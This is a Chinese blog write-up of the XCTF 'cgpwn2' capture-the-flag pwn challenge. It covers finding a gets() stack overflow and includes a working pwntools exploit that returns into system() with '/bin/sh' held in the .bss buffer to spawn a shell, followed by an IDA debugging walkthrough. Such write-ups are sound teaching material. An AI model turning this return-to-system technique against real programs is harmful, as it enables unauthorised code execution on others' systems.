美文网首页
XCTF cgpwn2

XCTF cgpwn2

作者: doinb1517 | 来源:发表于2022-01-25 10:26 被阅读0次

题目

desc.png

https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1

题解

使用checksec检查

checksec.png

丢进IDA Pro查看,get()函数存在溢出

f5.png

找可以利用的函数和字符串。找到system函数,没有找到可以利用的字符串。

system.png strings.png

得到system函数的地址为0x08048420

system_addr.png

name位于.bss段,可以通过给name变量赋值执行任意命令。尝试输入\bin\sh得到shell。name的地址是0x0804A080

name.png

由以上信息可以直接写WP。

from pwn import *
cnn = process('./cgpwn')

system_addr = 0x08048420

binsh_addr = 0x0804A080

payload = 42*b'a' + p32(system_addr) + b'aaaa' + p32(binsh_addr)

cnn.sendlineafter('name\n','/bin/sh')

cnn.sendlineafter('here:\n',payload)

cnn.interactive()

也可以使用IDA调试一遍玩玩,hello处下断点,F7步入,

hello.png

依次输入/bin/shAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,停在0x080485FC处,F2修改栈上数据,完成后如下。

stack.png stack_after.png

之后一直F8即可获得shell。

f8.png shell.png

相关文章

  • XCTF cgpwn2

    题目 https://adworld.xctf.org.cn/task/answer?type=pwn&numbe...

  • XCTF_OJ 练习平台

    传送门:http://oj.xctf.org.cn/login/?next=/ XCTF-OJ (X Captur...

  • cgpwn2

    0x00 file和checksec 0x01 ida分析 调用了hello函数 存在危险函数gets 发现nam...

  • unserialize3

    class xctf{ public $flag = '111'; public function __wakeu...

  • 攻防世界(进阶)--WEB--5.unserialize3

    考察点:反序列化 1.进入场景,代码审计 xctf类中变量flag值为111,序列化后为 O:4:"xctf":1...

  • 1. SimpleJs

    题目链接:https://adworld.xctf.org.cn/challenges/details?hash=...

  • xctf reverse

    解决linux的-bash: ./xx: Permission denied 未解 1.gdb

  • XCTF bug

    XCTF bug 描述 暂无 题解 一个注册,一个找回密码 随便注册一个账户,然后登陆,这里可以显示个人信息,修改...

  • WP:re2-cpp-is-awesome

    re2-cpp-is-awesome 来源:alexctf2017 地址:https://adworld.xctf...

  • XCTF Web_python_template_injecti

    题目来源 https://adworld.xctf.org.cn/task/answer?type=web&num...

网友评论

      本文标题:XCTF cgpwn2

      本文链接:https://www.haomeiwen.com/subject/fkhwhrtx.html